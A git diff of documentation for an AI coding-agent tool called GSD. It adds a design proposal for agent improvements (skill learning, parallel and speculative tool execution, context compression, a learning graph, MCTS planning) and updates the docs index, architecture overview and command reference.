+| `compaction.ts` | Provides trajectory data from the session for distillation |
+
+### Architecture
+
+```
+User invokes skill
+        │
+        ▼
+┌──────────────┐     ┌──────────────────┐
+│ AgentSession  │────▶│  Skill Executor   │
+│ (turn_end)    │     │  (tracks outcome) │
+└──────────────┘     └────────┬─────────┘
+                              │
+                    ┌─────────▼──────────┐
+                    │ Outcome Classifier  │
+                    │ (success/failure/   │
+                    │  partial)           │
+                    └─────────┬──────────┘
+                              │
+              ┌───────────────┼───────────────┐
+              ▼               ▼               ▼
+     ┌────────────┐  ┌──────────────┐  ┌───────────┐
+     │  Success   │  │   Failure    │  │  Partial   │
+     │  Distiller │  │  Distiller   │  │  Analyzer  │
+     └─────┬──────┘  └──────┬───────┘  └─────┬─────┘
+           │                │                 │
+           ▼                ▼                 ▼
+     ┌─────────────────────────────────────────────┐
+     │           Skill File Updater                 │
+     │  • Appends learned pattern to skill          │
+     │  • Versions the update                       │
+     │  • Preserves original skill intent           │
+     └─────────────────────────────────────────────┘
+```
+
+### Open Questions
+
+- **Drift prevention:** How to prevent accumulated learnings from overwhelming the original skill intent?
+- **Conflict resolution:** What happens when a lesson from one session contradicts another?
+- **Quality gate:** Should updates require a validation pass before being written?
+
+---
+
+## 2. DAG-Based Parallel Tool Execution
+
+**Category:** Performance
+**Impact:** High | **Effort:** Medium | **Priority:** #2
+
+### What It Is
+
+The [LLM Compiler pattern](https://arxiv.org/pdf/2312.04511) (ICML 2024) treats multi-tool workflows like a compiler optimization pass. When the model returns multiple tool calls in a single response, instead of executing them sequentially, the system:
+
+1. Analyzes dependencies between tool calls
+2. Constructs a Directed Acyclic Graph (DAG)
+3. Executes independent tools in parallel
+4. Blocks only on actual data dependencies
+
+### How It Works
+
+**Current GSD behavior (sequential):**
+```
+Read(auth.ts) ─── 150ms ───▶ result
+                               │
+Read(types.ts) ─── 120ms ──▶ result
+                               │
+Grep("login") ─── 80ms ────▶ result
+                               │
+Read(test.ts) ─── 130ms ───▶ result
+                               │
+Total: ~480ms sequential
+```
+
+**With DAG execution (parallel):**
+```
+Read(auth.ts)  ─── 150ms ──▶ result ─┐
+Read(types.ts) ─── 120ms ──▶ result ─┤
+Grep("login")  ─── 80ms ───▶ result ─┤── all complete at 150ms
+Read(test.ts)  ─── 130ms ──▶ result ─┘
+                                      │
+Total: ~150ms (max of parallel set)
+```
+
+**Dependency analysis rules:**
+
+| Tool A | Tool B | Dependency? | Reason |
+|--------|--------|-------------|--------|
+| Read(file) | Read(file) | No | Reads are idempotent |
+| Read(file) | Grep(pattern) | No | Independent data sources |
+| Read(file) | Edit(file) | Yes | Edit depends on Read content |
+| Edit(file) | Edit(file) | Yes | Edits to same file must serialize |
+| Bash(cmd) | Bash(cmd) | Maybe | Depends on side effects |
+| Write(file) | Read(file) | Yes | Read after write needs write to complete |
+
+### Why It Fits GSD-2
+
+The model already emits multiple `tool_use` blocks in a single response. GSD processes them, but the execution path in `agent-loop.ts` handles them in sequence. The parallelism opportunity is sitting right there.
+
+**Measured impact estimate:** A typical coding turn involves 3-5 tool calls. With 60% parallelizable (reads, greps, globs), per-turn latency drops by 40-60%. Over a 50-turn session, that's minutes saved.
+
+### Integration Points
+
+| GSD Component | Role in Integration |
+|---------------|-------------------|
+| `agent-loop.ts` tool execution path | Replace sequential execution with DAG scheduler |
+| Tool definitions | Annotate tools with side-effect metadata (pure/impure) |
+| Extension hooks (`tool_*`) | Must still fire in correct order per dependency chain |
+
+### Architecture
+
+```
+Model response with N tool_use blocks
+                │
+                ▼
+┌──────────────────────────────┐
+│      Dependency Analyzer      │
+│  • Parse tool calls           │
+│  • Identify file overlaps     │
+│  • Identify data dependencies │
+│  • Classify: pure vs impure   │
+└──────────────┬───────────────┘
+               │
+               ▼
+┌──────────────────────────────┐
+│        DAG Constructor        │
+│  • Nodes = tool calls         │
+│  • Edges = dependencies       │
+│  • Topological sort           │
+└──────────────┬───────────────┘
+               │
+               ▼
+┌──────────────────────────────┐
+│      Parallel Executor        │
+│  • Execute roots immediately  │
+│  • On completion, unlock      │
+│    dependent nodes            │
+│  • Collect all results        │
+│  • Return in original order   │
+└──────────────────────────────┘
+```
+
+### Open Questions
+
+- **Bash side effects:** How to determine if two Bash commands conflict without executing them?
+- **Extension hooks:** Should `tool_start`/`tool_end` events fire in execution order or original order?
+- **Error propagation:** If a parallel tool fails, do dependent tools get cancelled or receive the error?
+
+---
+
+## 3. Speculative Tool Execution
+
+**Category:** Performance
+**Impact:** High | **Effort:** Low-Medium | **Priority:** #3
+
+### What It Is
+
+Based on [Speculative Tool Calls research](https://arxiv.org/pdf/2512.15834), this technique predicts which tools the model will request and pre-executes them before the model responds. Correct predictions eliminate the first tool-call round-trip entirely. Wrong predictions are discarded at zero cost beyond compute.
+
+### How It Works
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│ User: "fix the bug in auth.ts"                              │
+│                                                             │
+│ BEFORE model responds:                                      │
+│   Speculator predicts:                                      │
+│     ├─ Read("auth.ts")           → pre-executed ✓           │
+│     ├─ Grep("error|bug", "auth") → pre-executed ✓           │
+│     ├─ LSP diagnostics(auth.ts)  → pre-executed ✓           │
+│     └─ Read("auth.test.ts")      → pre-executed ✓           │
+│                                                             │
+│ Model responds with tool calls:                             │
+│     ├─ Read("auth.ts")           → CACHE HIT (0ms)         │
+│     ├─ Read("auth.test.ts")      → CACHE HIT (0ms)         │
+│     └─ Grep("login", "src/")     → cache miss (execute)    │
+│                                                             │
+│ Hit rate: 2/3 = 67%                                         │
+│ Latency saved: ~300ms on this turn                          │
+└─────────────────────────────────────────────────────────────┘
+```
+
+**Prediction strategies (simplest to most sophisticated):**
+
+| Strategy | Description | Expected Hit Rate |
+|----------|-------------|-------------------|
+| **Keyword extraction** | Parse user prompt for file paths, function names → Read those files | 40-60% |
+| **Session history** | Track which tools follow which user prompt patterns | 50-70% |
+| **Learned patterns** | Use the skill library evolution data to predict tool sequences | 60-80% |
+| **Model pre-query** | Ask a fast/cheap model to predict tool calls | 70-85% |
+
+### Why It Fits GSD-2
+
+The #1 latency bottleneck in GSD is the round-trip: user prompt → model thinks → model requests tool → tool executes → result sent back → model thinks again. Speculative execution attacks the highest-latency step.
+
+GSD's architecture makes this easy to add:
+- `AgentSession.prompt()` already processes user input before sending to the model
+- Tool results are already cached in the message array
+- The extension system can intercept input and spawn pre-fetches
+
+### Integration Points
+
+| GSD Component | Role in Integration |
+|---------------|-------------------|
+| `AgentSession.prompt()` | Trigger speculation after user input, before model call |
+| Tool result cache (new) | Store speculated results keyed by tool+args |
+| `agent-loop.ts` tool execution | Check cache before executing; serve cached result on hit |
+| Extension hook: `input` | Parse user intent for file paths, patterns |
+
+### Architecture
+
+```
+User input arrives
+        │
+        ├──────────────────────────────────────┐
+        │                                      │
+        ▼                                      ▼
+┌───────────────┐                    ┌──────────────────┐
+│  Send to LLM  │                    │   Speculator      │
+│  (normal path) │                    │  • Extract paths   │
+│               │                    │  • Predict tools   │
+│  ... waiting  │                    │  • Pre-execute     │
+│  for response │                    │  • Cache results   │
+│               │                    └──────────────────┘
+│               │                              │
+│               │◀─── model returns ──────────│
+│               │     tool_use blocks         │
+└───────┬───────┘                              │
+        │                                      │
+        ▼                                      │
+┌───────────────┐                              │
+│ Tool Executor  │◀──── check cache ───────────┘
+│ • Cache hit?   │
+│   → return     │
+│ • Cache miss?  │
+│   → execute    │
+└───────────────┘
+```
+
+### Cost Analysis
+
+| Scenario | Cost |
+|----------|------|
+| **Correct prediction** | ~0ms latency (result already available). Compute cost: the pre-execution itself (trivial for Read/Grep). |
+| **Wrong prediction** | Wasted compute for the pre-executed tool. For Read/Grep/Glob, this is <10ms of I/O. |
+| **Partial hit** | Net positive as long as hit rate > 20% (given how cheap misses are). |
+
+### Open Questions
+
+- **TTL for cached results:** How long are speculated results valid? File contents can change between speculation and model request.
+- **Side effects:** Should only pure tools (Read, Grep, Glob, LSP) be speculatable?
+- **Resource limits:** Cap on number of speculative executions per turn to prevent I/O storms?
+
+---
+
+## 4. Semantic Context Compression
+
+**Category:** Intelligence
+**Impact:** High | **Effort:** High | **Priority:** #4
+
+### What It Is
+
+GSD's compaction system uses a char/4 heuristic for token estimation and all-or-nothing LLM summarization for context reduction. Research from [Zylos](https://zylos.ai/research/2026-02-28-ai-agent-context-compression-strategies) and [context engineering literature](https://rlancemartin.github.io/2025/06/23/context_engineering/) shows that embedding-based compression achieves 80-90% token reduction while preserving the ability to selectively recall specific historical context.
+
+### Current GSD Compaction (Weaknesses Highlighted)
+
+```
+Messages: [M1, M2, M3, M4, M5, M6, M7, M8, M9, M10]
+                                                    ▲
+Token budget exceeded                               │ recent
+                                                    │
+Current approach:
+┌─────────────────────────┬─────────────────────────┐
+│  M1-M6: LLM-summarized │  M7-M10: kept verbatim  │
+│  into single blob       │  (last ~20k tokens)     │
+│                         │                         │
+│  ⚠ All detail lost      │  ✓ Full fidelity        │
+│  ⚠ No selective recall  │                         │
+│  ⚠ char/4 overestimates │                         │
+└─────────────────────────┴─────────────────────────┘
+```
+
+**Three specific weaknesses:**
+
+| Weakness | Impact | Current Code Location |
+|----------|--------|-----------------------|
+| char/4 token estimation | ~25% overestimate → compacts too early → wastes context | `compaction.ts:201-259` |
+| All-or-nothing summarization | Loses specific details that may be relevant later | `compaction.ts:327-400` |
+| No retrieval from compacted history | Once summarized, detail is gone forever | `compaction-orchestrator.ts` |
+
+### Proposed: Tiered Memory Architecture
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    HOT TIER                              │
+│  Recent turns (last ~20k tokens)                        │
+│  Full text, full fidelity                               │
+│  Storage: in-context messages                           │
+│  Access: always in prompt                               │
+├─────────────────────────────────────────────────────────┤
+│                    WARM TIER                             │
+│  Older turns (beyond context window)                    │
+│  Stored as embeddings + compressed text                 │
+│  Storage: session-local vector index                    │
+│  Access: retrieved when semantically relevant to        │
+│          current turn                                   │
+│  Token cost: only retrieved segments count              │
+├─────────────────────────────────────────────────────────┤
+│                    COLD TIER                             │
+│  Ancient turns / previous sessions                      │
+│  Stored as summaries + metadata                         │
+│  Storage: disk (existing session files)                 │
+│  Access: retrieved only on explicit recall              │
+│  Token cost: minimal summary headers                    │
+└─────────────────────────────────────────────────────────┘
+```
+
+**How retrieval works per turn:**
+
+```
+New user prompt arrives
+        │
+        ▼
+┌───────────────────┐
+│  Embed the prompt  │ (compute embedding of user's question)
+└────────┬──────────┘
+         │
+         ├──── query warm tier ──▶ top-K relevant historical turns
+         │                         (cosine similarity > threshold)
+         │
+         ├──── always include ──▶ hot tier (recent turns, full text)
+         │
+         ▼
+┌───────────────────┐
+│  Compose context   │
+│  = hot + retrieved │
+│  + system prompt   │
+└───────────────────┘
+```
+
+### Token Estimation Improvement
+
+Replace char/4 with adaptive estimation:
+
+| Approach | Accuracy | Cost |
+|----------|----------|------|
+| **char/4 (current)** | ~75% (overestimates) | Zero |
+| **Provider-reported usage** | 100% (for last turn) | Zero (already tracked) |
+| **tiktoken/provider tokenizer** | ~98% | ~5ms per message |
+| **Hybrid: actual for recent, char/4 for old** | ~95% | Negligible |
+
+The hybrid approach — use actual token counts from provider responses for recent messages, fall back to char/4 for older messages — is a quick win that requires no new dependencies.
+
+### Integration Points
+
+| GSD Component | Role in Integration |
+|---------------|-------------------|
+| `compaction.ts` | Replace cut-point algorithm with tiered approach |
+| `compaction-orchestrator.ts` | Add warm-tier retrieval before model call |
+| `agent-session.ts` message building | Inject retrieved warm-tier segments |
+| Session persistence layer | Store embeddings alongside session entries |
+
+### Open Questions
+
+- **Embedding model:** Local (fast, private) or API (better quality, adds latency)?
+- **Index format:** Simple cosine similarity on flat arrays vs. HNSW index?
+- **Retrieval budget:** How many tokens to allocate to warm-tier retrievals per turn?
+- **Coherence:** How to prevent retrieved historical context from confusing the model about the current state?
+
+---
+
+## 5. Cross-Session Learning Graph
+
+**Category:** Self-Improvement
+**Impact:** Transformative | **Effort:** High | **Priority:** #5
+
+### What It Is
+
+GSD's memory system (MEMORY.md + individual files) stores flat, file-based memories. A learning graph extends this into a structured knowledge base that captures relationships between codebases, files, errors, solutions, and patterns across all sessions.
+
+This is informed by research on [agent memory architectures](https://github.com/Shichun-Liu/Agent-Memory-Paper-List) and the emerging discipline of [context engineering](https://thenewstack.io/memory-for-ai-agents-a-new-paradigm-of-context-engineering/).
+
+### Current Memory vs Learning Graph
+
+| Aspect | Current (MEMORY.md) | Learning Graph |
+|--------|---------------------|----------------|
+| **Structure** | Flat file list | Nodes + edges (graph) |
+| **Relationships** | None | "file X often breaks when Y changes" |
+| **Retrieval** | All loaded into context | Query-driven, only relevant nodes |
+| **Learning** | Manual (user says "remember X") | Automatic from execution outcomes |
+| **Scope** | Per-project directory | Per-project with cross-project patterns |
+| **Staleness** | Manual cleanup | Confidence decay over time |
+
+### Graph Schema
+
+```
+┌──────────┐     touches      ┌──────────┐
+│  Session  │────────────────▶│   File    │
+│           │                 │           │
+│ • date    │                 │ • path    │
+│ • outcome │                 │ • type    │
+│ • tokens  │                 │ • churn   │
+└────┬──────┘                 └─────┬─────┘
+     │                              │
+     │ encountered                  │ involved_in
+     │                              │
+     ▼                              ▼
+┌──────────┐    resolved_by   ┌──────────┐
+│  Error    │────────────────▶│ Solution  │
+│           │                 │           │
+│ • type    │                 │ • pattern │
+│ • message │                 │ • success │
+│ • freq    │                 │   rate    │
+└──────────┘                 └──────────┘
+     │                              │
+     │ prevented_by                 │ uses
+     │                              │
+     ▼                              ▼
+┌──────────┐                 ┌──────────┐
+│  Pattern  │                │   Tool   │
+│           │                │          │
+│ • type    │                │ • name   │
+│ • desc    │                │ • avg    │
+│ • conf    │                │   time   │
+└──────────┘                 └──────────┘
+```
+
+### Example Queries
+
+| Query | Result |
+|-------|--------|
+| "What errors have occurred in `auth.ts`?" | List of error nodes connected to that file node |
+| "What's the typical fix for `TypeError` in this codebase?" | Solution nodes with highest success rate for that error type |
+| "Which files tend to break together?" | File clusters with high co-occurrence in error sessions |
+| "What tools are slowest in this project?" | Tool nodes sorted by avg execution time |
+
+### Integration Points
+
+| GSD Component | Role in Integration |
+|---------------|-------------------|
+| `session-manager.ts` | Write graph nodes on session save |
+| `agent-session.ts` prompt building | Query graph for relevant context before model call |
+| Memory system (MEMORY.md) | Coexists — graph handles structured knowledge, memory handles preferences/feedback |
+| Extension hook: `agent_end` | Trigger graph update with session outcome |
+
+### Storage Options
+
+| Option | Pros | Cons |
+|--------|------|------|
+| **SQLite + json columns** | Simple, no dependencies, fast queries | No native vector search |
+| **SQLite + sqlite-vss** | Adds vector similarity to SQLite | Extra native dependency |
+| **Flat JSON files** | Zero dependencies, git-friendly | Slow for large graphs |
+| **LanceDB** | Embedded vector DB, no server | Additional dependency |
+
+### Open Questions
+
+- **Privacy:** Graph contains detailed codebase interaction history — should it be encrypted at rest?
+- **Portability:** Should the graph travel with the project (`.claude/` dir) or stay user-local?
+- **Garbage collection:** How to prune stale nodes (e.g., files that no longer exist)?
+
+---
+
+## 6. MCTS-Based Planning
+
+**Category:** Intelligence
+**Impact:** Transformative | **Effort:** Very High | **Priority:** #6
+
+### What It Is
+
+Inspired by [ToolTree](https://www.agentic-patterns.com/patterns/skill-library-evolution/) and Monte Carlo Tree Search, this technique replaces GSD's linear action selection with a tree-based planner that explores multiple solution paths simultaneously.
+
+Instead of the model deciding one action at a time and hoping it works, the system:
+
+1. Generates N candidate next-actions
+2. Scores each based on estimated probability of reaching the goal
+3. Explores promising branches in parallel
+4. Backtracks when a path fails, without wasting the user's context on dead ends
+
+### Current vs MCTS Approach
+
+**Current (linear):**
+```
+User: "fix the auth bug"
+  │
+  ▼
+Action 1: Read auth.ts ──▶ Action 2: Edit line 45 ──▶ Action 3: Run tests
+                                                              │
+                                                         Tests fail ✗
+                                                              │
+                                                         ▼
+                                                    Action 4: Try different edit
+                                                              │
+                                                         Tests fail ✗
+                                                              │
+                                                         ▼
+                                                    Action 5: Read error log...
+                                                    (linear flailing)
+```
+
+**With MCTS (tree search):**
+```
+User: "fix the auth bug"
+  │
+  ▼
+Read auth.ts
+  │
+  ├── Branch A: Edit line 45 (score: 0.6)
+  │     └── Run tests → FAIL → prune
+  │
+  ├── Branch B: Check auth middleware (score: 0.7)  ◀── highest score
+  │     └── Edit middleware.ts → Run tests → PASS ✓
+  │
+  └── Branch C: Check env config (score: 0.3)
+        └── (not explored — lower score)
+
+Result: Branch B succeeds after 2 actions, not 5+
+```
+
+### Why It Fits GSD-2
+
+GSD already has session branching primitives:
+- `fork()` creates a branch from any message
+- Branch summaries compress history at fork points
+- Tree navigation (`/tree`) lets users explore branches
+- Session tree is already a first-class concept
+
+The gap: these primitives are user-triggered. MCTS would make the agent trigger them automatically during problem-solving.
+
+### Architecture
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    MCTS Planning Layer                   │
+│                                                         │
+│  ┌─────────────┐    ┌──────────────┐    ┌────────────┐ │
+│  │   Proposer   │───▶│   Scorer     │───▶│  Selector  │ │
+│  │ Generate N   │    │ Estimate P   │    │ Pick best  │ │
+│  │ candidates   │    │ of success   │    │ to explore │ │
+│  └─────────────┘    └──────────────┘    └─────┬──────┘ │
+│                                               │        │
+│  ┌─────────────┐    ┌──────────────┐          │        │
+│  │  Pruner     │◀───│   Executor   │◀─────────┘        │
+│  │ Kill dead   │    │ Run action   │                   │
+│  │ branches    │    │ in worktree  │                   │
+│  └─────────────┘    └──────────────┘                   │
+└─────────────────────────────────────────────────────────┘
+         │
+         ▼
+┌─────────────────────┐
+│  Agent Session       │
+│  (receives winning   │
+│   branch as result)  │
+└─────────────────────┘
+```
+
+### Scoring Approaches
+
+| Approach | Speed | Quality | Cost |
+|----------|-------|---------|------|
+| **Heuristic** (file relevance, error proximity) | Fast | Low | Free |
+| **Fast model** (haiku-class rates candidates) | Medium | Medium | Low |
+| **Self-evaluation** (main model rates its own proposals) | Slow | High | High |
+| **Learned scorer** (trained on past outcomes from learning graph) | Fast | High | Free at inference |
+
+### Integration Points
+
+| GSD Component | Role in Integration |
+|---------------|-------------------|
+| `agent-loop.ts` | New planning phase between user prompt and action execution |
+| Session branching (`fork()`) | Used to create exploration branches |
+| Git worktrees | Each branch explored in an isolated worktree |
+| `agent-session.ts` | Receives the winning branch and presents it as the result |
+| Skill Library Evolution (#1) | Provides learned patterns to improve the scorer over time |
+
+### Cost-Benefit Analysis
+
+| Factor | Value |
+|--------|-------|
+| **LLM calls per turn** | 2-5x more (proposal generation + scoring) |
+| **Token usage** | 3-10x more per complex problem |
+| **Success rate on hard problems** | Estimated 30-50% improvement |
+| **Time to solution** | Fewer total turns despite more LLM calls per turn |
+| **User experience** | Agent appears to "think harder" on hard problems |
+
+### Open Questions
+
+- **When to activate:** MCTS is expensive. Should it only activate when the agent detects a hard problem (repeated failures, high uncertainty)?
+- **Branch isolation:** Git worktrees work for file changes, but how to isolate Bash side effects?
+- **Budget control:** How many branches to explore before falling back to linear execution?
+- **Transparency:** Should the user see the exploration tree or just the winning path?
+
+---
+
+## Priority Matrix
+
+| # | Technique | Impact | Effort | Compounding | Dependencies |
+|---|-----------|--------|--------|-------------|--------------|
+| 1 | **Skill Library Evolution** | Massive | Medium | Yes — improves all other techniques | None |
+| 2 | **DAG Tool Execution** | High | Medium | No — static speedup | None |
+| 3 | **Speculative Tool Execution** | High | Low-Med | Yes — improves with learning | Benefits from #1 |
+| 4 | **Semantic Context Compression** | High | High | No — static improvement | None |
+| 5 | **Cross-Session Learning Graph** | Transformative | High | Yes — feeds #1, #3, #6 | Benefits from #1 |
+| 6 | **MCTS Planning** | Transformative | Very High | Yes — improves with #1, #5 | Benefits from #1, #5 |
+
+### Recommended Implementation Order
+
+```
+Phase 1 (Foundation)          Phase 2 (Performance)       Phase 3 (Intelligence)
+─────────────────────         ─────────────────────       ─────────────────────
+┌─────────────────┐          ┌─────────────────┐         ┌─────────────────┐
+│ Skill Library    │          │ DAG Tool Exec   │         │ Semantic Context│
+│ Evolution        │──feeds──▶│                 │         │ Compression     │
+│                  │          │ Speculative     │         │                 │
+│                  │──feeds──▶│ Tool Exec       │         │ MCTS Planning   │
+└─────────────────┘          └─────────────────┘         └─────────────────┘
+                                      │                          ▲
+┌─────────────────┐                   │                          │
+│ Cross-Session   │───────────────────┴──────────────────────────┘
+│ Learning Graph  │         (feeds intelligence layer)
+└─────────────────┘
+```
+
+**Phase 1** creates the feedback loop that makes everything else better over time.
+**Phase 2** delivers immediate, measurable performance wins.
+**Phase 3** requires the most architectural change but delivers the deepest capability gains.
+
+---
+
+## Sources & References
+
+### Papers
+
+- [SkillRL: Evolving Agents via Recursive Skill-Augmented RL](https://arxiv.org/abs/2602.08234) — ICLR 2026. Skill library evolution framework.
+- [LLMCompiler: An LLM Compiler for Parallel Function Calling](https://arxiv.org/pdf/2312.04511) — ICML 2024. DAG-based tool execution.
+- [Optimizing Agentic LLM Inference via Speculative Tool Calls](https://arxiv.org/pdf/2512.15834) — Speculative execution for agent tools.
+- [RISE: Recursive Introspection for Self-Improvement](https://proceedings.neurips.cc/paper_files/paper/2024/file/639d992f819c2b40387d4d5170b8ffd7-Paper-Conference.pdf) — NeurIPS 2024. Self-improving LLM agents.
+- [Don't Break the Cache: Prompt Caching for Agentic Tasks](https://arxiv.org/html/2601.06007v1) — Prompt caching evaluation.
+- [Efficient LLM Serving for Agentic Workflows](https://arxiv.org/html/2603.16104v1) — Systems perspective on agent serving.
+
+### Industry & Analysis
+
+- [Context Engineering for Agents](https://rlancemartin.github.io/2025/06/23/context_engineering/) — Lance Martin's comprehensive guide.
+- [AI Agent Context Compression Strategies](https://zylos.ai/research/2026-02-28-ai-agent-context-compression-strategies) — Zylos Research, Feb 2026.
+- [Context Engineering for Coding Agents](https://martinfowler.com/articles/exploring-gen-ai/context-engineering-coding-agents.html) — Martin Fowler.
+- [Memory for AI Agents: A New Paradigm](https://thenewstack.io/memory-for-ai-agents-a-new-paradigm-of-context-engineering/) — The New Stack.
+- [LLM Compiler Agent Pattern](https://agent-patterns.readthedocs.io/en/stable/patterns/llm-compiler.html) — Agent Patterns documentation.
+- [Skill Library Evolution Pattern](https://www.agentic-patterns.com/patterns/skill-library-evolution/) — Awesome Agentic Patterns.
+
+### Workshops & Events
+
+- [ICLR 2026 Workshop on AI with Recursive Self-Improvement](https://iclr.cc/virtual/2026/workshop/10000796)
+- [Agent Memory Paper List](https://github.com/Shichun-Liu/Agent-Memory-Paper-List) — Comprehensive survey.
+- [Awesome Context Engineering](https://github.com/Meirtz/Awesome-Context-Engineering) — Papers, frameworks, guides.
diff --git a/docs/README.md b/docs/README.md
index c37b303c0..f4b2d398b 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -11,7 +11,8 @@ Welcome to the GSD documentation. This covers everything from getting started to
 | [Commands Reference](./commands.md) | All commands, keyboard shortcuts, and CLI flags |
 | [Remote Questions](./remote-questions.md) | Discord and Slack integration for headless auto-mode |
 | [Configuration](./configuration.md) | Preferences, model selection, git settings, and token profiles |
-| [Custom Models](./custom-models.md) | Add custom providers (Ollama, vLLM, LM Studio, proxies) via models.json |
+| [Provider Setup](./providers.md) | Step-by-step setup for OpenRouter, Ollama, LM Studio, vLLM, and all supported providers |
+| [Custom Models](./custom-models.md) | Advanced model configuration — models.json schema, compat flags, overrides |
 | [Token Optimization](./token-optimization.md) | Token profiles, context compression, complexity routing, and adaptive learning (v2.17) |
 | [Dynamic Model Routing](./dynamic-model-routing.md) | Complexity-based model selection, cost tables, escalation, and budget pressure (v2.19) |
 | [Captures & Triage](./captures-triage.md) | Fire-and-forget thought capture during auto-mode with automated triage (v2.19) |
@@ -23,7 +24,7 @@ Welcome to the GSD documentation. This covers everything from getting started to
 | [Skills](./skills.md) | Bundled skills, skill discovery, and custom skill authoring |
 | [Migration from v1](./migration.md) | Migrating `.planning` directories from the original GSD |
 | [Troubleshooting](./troubleshooting.md) | Common issues, `/gsd doctor` (real-time visibility v2.40), `/gsd forensics` (full debugger v2.40), and recovery procedures |
-| [Web Interface](./web-interface.md) | Browser-based project management with `pi --web` (v2.41) |
+| [Web Interface](./web-interface.md) | Browser-based project management with `gsd --web` (v2.41) |
 | [VS Code Extension](../vscode-extension/README.md) | Chat participant, sidebar dashboard, and RPC integration for VS Code |
 
 ## Architecture & Internals
@@ -34,6 +35,9 @@ Welcome to the GSD documentation. This covers everything from getting started to
 | [Native Engine](../native/README.md) | Rust N-API modules for performance-critical operations |
 | [ADR-001: Branchless Worktree Architecture](./ADR-001-branchless-worktree-architecture.md) | Decision record for the v2.14 git architecture |
 | [ADR-003: Pipeline Simplification](./ADR-003-pipeline-simplification.md) | Research merged into planning, mechanical completion (v2.30) |
+| [ADR-004: Capability-Aware Model Routing](./ADR-004-capability-aware-model-routing.md) | Extend routing from tier/cost selection to task-capability matching |
+| [ADR-007: Model Catalog Split](./ADR-007-model-catalog-split.md) | Separate model metadata from routing logic for extensibility |
+| [Context Optimization Opportunities](./pi-context-optimization-opportunities.md) | Analysis of context window usage and optimization strategies |
 
 ## Pi SDK Documentation
 
diff --git a/docs/architecture.md b/docs/architecture.md
index a166c148b..381029731 100644
--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -14,7 +14,7 @@ gsd (CLI binary)
           ├─ resource-loader.ts  Syncs bundled extensions + agents to ~/.gsd/agent/
           └─ src/resources/
               ├─ extensions/gsd/    Core GSD extension
-              ├─ extensions/...     12 supporting extensions
+              ├─ extensions/...     23 supporting extensions
               ├─ agents/            scout, researcher, worker
               ├─ AGENTS.md          Agent routing instructions
               └─ GSD-WORKFLOW.md    Manual bootstrap protocol
@@ -73,6 +73,12 @@ Every dispatch creates a new agent session. The LLM starts with a clean context
 | **Remote Questions** | Discord, Slack, and Telegram integration for headless question routing |
 | **TTSR** | Tool-triggered system rules — conditional context injection based on tool usage |
 | **Universal Config** | Discovery of existing AI tool configurations (Claude Code, Cursor, Windsurf, etc.) |
+| **AWS Auth** | AWS credential management and authentication |
+| **Claude Code CLI** | Claude Code CLI integration |
+| **cmux** | Context multiplexing for multi-session coordination |
+| **GitHub Sync** | GitHub issue and PR synchronization |
+| **Ollama** | Local Ollama model integration |
+| **Shared** | Shared utilities across extensions |
 
 ## Bundled Agents
 
@@ -122,7 +128,7 @@ The auto mode dispatch pipeline:
 
 Phase skipping (from token profile) gates steps 2-3: if a phase is skipped, the corresponding unit type is never dispatched.
 
-## Key Modules (v2.33)
+## Key Modules (v2.67)
 
 | Module | Purpose |
 |--------|---------|
@@ -160,3 +166,11 @@ Phase skipping (from token profile) gates steps 2-3: if a phase is skipped, the
 | `memory-extractor.ts` | Extract reusable knowledge from session transcripts |
 | `memory-store.ts` | Persistent memory store for cross-session knowledge |
 | `queue-order.ts` | Milestone queue ordering |
+| `context-masker.ts` | Context masking for model routing optimization |
+| `phase-anchor.ts` | Phase anchoring for dispatch pipeline |
+| `slice-parallel-orchestrator.ts` | Slice-level parallelism with dependency-aware dispatch |
+| `slice-parallel-eligibility.ts` | Slice parallel eligibility checks |
+| `slice-parallel-conflict.ts` | Slice parallel conflict detection |
+| `preferences-models.ts` | Model preferences configuration |
+| `preferences-validation.ts` | Preferences validation |
+| `preferences-types.ts` | Preferences type definitions |
diff --git a/docs/commands.md b/docs/commands.md
index 5826978df..1ed935f8b 100644
--- a/docs/commands.md
+++ b/docs/commands.md
@@ -9,12 +9,16 @@
 | `/gsd auto` | Autonomous mode — research, plan, execute, commit, repeat |
 | `/gsd quick` | Execute a quick task with GSD guarantees (atomic commits, state tracking) without full planning overhead |
 | `/gsd stop` | Stop auto mode gracefully |
+| `/gsd pause` | Pause auto-mode (preserves state, `/gsd auto` to resume) |
 | `/gsd steer` | Hard-steer plan documents during execution |
 | `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) |
 | `/gsd status` | Progress dashboard |
+| `/gsd widget` | Cycle dashboard widget: full / small / min / off |
 | `/gsd queue` | Queue and reorder future milestones (safe during auto mode) |
 | `/gsd capture` | Fire-and-forget thought capture (works during auto mode) |
 | `/gsd triage` | Manually trigger triage of pending captures |
+| `/gsd dispatch` | Dispatch a specific phase directly (research, plan, execute, complete, reassess, uat, replan) |
+| `/gsd history` | View execution history (supports `--cost`, `--phase`, `--model` filters) |
 | `/gsd forensics` | Full-access GSD debugger — structured anomaly detection, unit traces, and LLM-guided root-cause analysis for auto-mode failures |
 | `/gsd cleanup` | Clean up GSD state files and stale worktrees |
 | `/gsd visualize` | Open workflow visualizer (progress, deps, metrics, timeline) |
@@ -22,6 +26,11 @@
 | `/gsd export --html --all` | Generate retrospective reports for all milestones at once |
 | `/gsd update` | Update GSD to the latest version in-session |
 | `/gsd knowledge` | Add persistent project knowledge (rule, pattern, or lesson) |
+| `/gsd fast` | Toggle service tier for supported models (prioritized API routing) |
+| `/gsd rate` | Rate last unit's model tier (over/ok/under) — improves adaptive routing |
+| `/gsd changelog` | Show categorized release notes |
+| `/gsd logs` | Browse activity logs, debug logs, and metrics |
+| `/gsd remote` | Control remote auto-mode |
 | `/gsd help` | Categorized command reference with descriptions for all GSD subcommands |
 
 ## Configuration & Diagnostics
@@ -33,6 +42,9 @@
 | `/gsd config` | Re-run the provider setup wizard (LLM provider + tool keys) |
 | `/gsd keys` | API key manager — list, add, remove, test, rotate, doctor |
 | `/gsd doctor` | Runtime health checks with auto-fix — issues surface in real time across widget, visualizer, and HTML reports (v2.40) |
+| `/gsd inspect` | Show SQLite DB diagnostics |
+| `/gsd init` | Project init wizard — detect, configure, bootstrap `.gsd/` |
+| `/gsd setup` | Global setup status and configuration |
 | `/gsd skill-health` | Skill lifecycle dashboard — usage stats, success rates, token trends, staleness warnings |
 | `/gsd skill-health <name>` | Detailed view for a single skill |
 | `/gsd skill-health --declining` | Show only skills flagged for declining performance |
